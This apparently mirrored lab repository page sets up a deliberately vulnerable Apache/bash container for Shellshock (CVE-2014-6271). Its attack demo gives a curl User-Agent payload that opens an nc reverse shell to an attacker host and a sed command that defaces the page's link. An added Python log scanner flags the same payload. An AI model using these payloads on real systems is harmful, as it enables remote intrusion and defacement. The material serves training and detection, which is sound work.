Related vulnerability
Title:
GNU Bash remote code execution vulnerability
(CVE-2014-6271)
Description: GNU Bash is a shell (command language interpreter) written by American software developer Brian J. Fox for the GNU Project. It runs on Unix-like operating systems (it is the default shell on Linux), reads and executes commands from standard input or from a file, and incorporates some features of ksh and csh. GNU Bash 4.3 and earlier contain a security vulnerability caused by the program not correctly handling function definitions inside environment variable values. A remote attacker can exploit it to execute arbitrary code via a crafted environment variable. The following products and modules may be affected: ForceComman in OpenSSH sshd
Description
This repo is a PoC environment for CVE-2014-6271 (https://nvd.nist.gov/vuln/detail/cve-2014-6271).
Introduction
# CVE-2014-6271-Apache-Debian
## Overview
This repo is a PoC environment for [CVE-2014-6271](https://nvd.nist.gov/vuln/detail/cve-2014-6271).
You can deploy a web service containing the vulnerability using an apache2 container image.
## Preparation
### Image Build
Build the insecure images from the Dockerfiles.
~~~
# docker build -t cve-2014-6271-apache-debian:buster ./insecure-base-image/
# docker build -t training-website-poc:v1.0 ./web-insecure/
~~~
### Deploy PoC Container
**Docker**
Deploy the PoC container as a Docker container.
~~~
# docker run -d -p 8080:80 training-website-poc:v1.0
~~~
**Kubernetes**
Deploy the PoC container as a k8s pod and service.
~~~
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-pod.yml
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-svc.yml
~~~
### Access PoC Web Service
After the deployment completes, you can browse the web page by opening the following URL in a browser.
The link "Click!" at the bottom of the web page leads to the k8s lab environment.
**Docker**
~~~
http://<docker host IP>:8080
~~~
**Kubernetes**
~~~
http://<k8s service endpoint>:<k8s service port>
~~~
### Attack Demo
In this demo, you change the web page from an attacker host (outside the container) by exploiting `CVE-2014-6271`.
Run these commands from the attacker host.
Terminal 1
~~~
# nc -nvlp 5050
~~~
Terminal 2
※ In this case the PoC container is deployed with Docker. For Kubernetes, use `http://<k8s service endpoint>:<k8s service port>` as the URL.
~~~
# curl -H "user-agent: () { :; }; echo; /bin/nc -e /bin/bash <Attacker Host IP> 5050" http://<docker host IP>:8080/cgi-bin/vulnerable
~~~
After that, a `/bin/bash` shell from the PoC container is available in terminal 1:
~~~
Listening on 0.0.0.0 5050
Connection received on 172.17.0.2 38926
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1000(wheel)
pwd
/usr/lib/cgi-bin
~~~
Change the "Click!" link on the web page.
In this case a dummy page is used as the target of the malicious link.
~~~
sudo sed -i -e 's/https\:\/\/www.katacoda.com\/courses\/kubernetes/danger.html/' /var/www/html/index.html
~~~
Access the web page again and click the "Click!" link at the bottom of the page.
~~~
http://<docker host IP>:8080
~~~
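A defender-side complement to the demo above, added here and not part of the repository: a small Python detector that parses Apache combined-format access log lines and flags requests whose User-Agent or Referer carries the `() {` function-definition prefix that triggers CVE-2014-6271. The log lines and the 192.0.2.10 attacker address are constructed for this example.

```python
import re

# Shellshock trigger (CVE-2014-6271): a value containing "() {" is parsed by a
# vulnerable bash as an exported function definition, and text after the
# closing brace is executed. Apache's CGI module exports request headers as
# environment variables (User-Agent -> HTTP_USER_AGENT), which is why the PoC
# sends the payload in a header. Whitespace is optional in the trigger, so the
# pattern also catches "(){" and is searched anywhere in the value.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache "combined" log format; the two trailing quoted fields are the
# Referer and User-Agent header values exactly as the client sent them.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (not taken from the repo): the first carries
# the PoC's User-Agent payload against the CGI script, the second is a normal
# browser hit, the third hides the same trigger in the Referer header.
# 192.0.2.10 is a documentation-range placeholder for the attacker host.
SAMPLE_LOG = """\
172.17.0.1 - - [10/Oct/2019:12:00:01 +0000] "GET /cgi-bin/vulnerable HTTP/1.1" 200 61 "-" "() { :; }; echo; /bin/nc -e /bin/bash 192.0.2.10 5050"
172.17.0.1 - - [10/Oct/2019:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
172.17.0.1 - - [10/Oct/2019:12:00:09 +0000] "GET /cgi-bin/vulnerable HTTP/1.1" 200 61 "() { :;}; echo" "curl/7.64.0"
"""


def is_shellshock_payload(header_value):
    """True if a header value contains a bash function-definition prefix."""
    return SHELLSHOCK_RE.search(header_value) is not None


def find_shellshock_attempts(log_text):
    """Scan combined-format access log text and return one
    (client_ip, request_line, header_field) tuple per line whose Referer or
    User-Agent carries a Shellshock-style payload; lines that do not match
    the combined format are skipped."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        for field in ("referer", "ua"):
            if is_shellshock_payload(m.group(field)):
                hits.append((m.group("ip"), m.group("req"), field))
    return hits
```

Pointed at the access log of the container above, the curl request from the demo shows up as a hit against `/cgi-bin/vulnerable` in the `ua` field; a hit on a host still running the bundled bash 4.2 package is the event to respond to.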
## Reference
https://github.com/hmlio/vaas-cve-2014-6271
https://github.com/opsxcq/exploit-CVE-2014-6271
File snapshot
[4.0K] /data/pocs/1677cdb0d4dad9ee3ade7b97982ea8813857dc63
├── [4.0K] insecure-base-image
│   ├── [ 373] danger.html
│   ├── [ 850] Dockerfile
│   ├── [4.0K] packages
│   │   └── [1.4M] bash_4.2%2Bdfsg-0.1_amd64.deb
│   └── [  61] vulnerable
├── [2.3K] README.md
├── [4.0K] web-insecure
│   ├── [ 208] Dockerfile
│   ├── [1.0K] index.html
│   └── [4.0K] k8s-manifest
│       ├── [ 215] web-insecure-pod.yml
│       └── [ 179] web-insecure-svc.yml
└── [4.0K] web-secure
    ├── [ 196] Dockerfile
    ├── [1.0K] index.html
    └── [4.0K] k8s-manifest
        ├── [ 713] web-secure-pod.yml
        └── [ 175] web-secure-svc.yml
6 directories, 13 files
Notes
1. It is recommended to access the original source first.
2. If the source has gone offline or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of this POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.